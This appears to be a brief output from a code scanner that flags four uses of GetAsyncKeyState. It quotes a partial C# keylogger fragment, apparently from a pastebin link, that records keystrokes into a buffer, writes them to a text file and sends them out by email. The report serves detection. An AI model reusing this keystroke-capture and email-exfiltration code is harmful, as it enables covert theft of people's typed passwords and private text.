Detected 4 occurrence(s) of ‘GetAsyncKeyState\(‘: buffer; if (text.Length > 0) { WriteTotxt(text); text = replaceChars(text); Email.Send(text); text = ""; } } bool shiftDown = GetAsyncKeyState(Keys.Shift) == -32767; foreach (...) { if (GetAsyncKeyState(i) == -32767) { var key = i.ToString(); buffer += shiftDown ? i : i.ToLower(); } } Source: http://pastebin.com/raw.php?i=5RkzZfyx
↧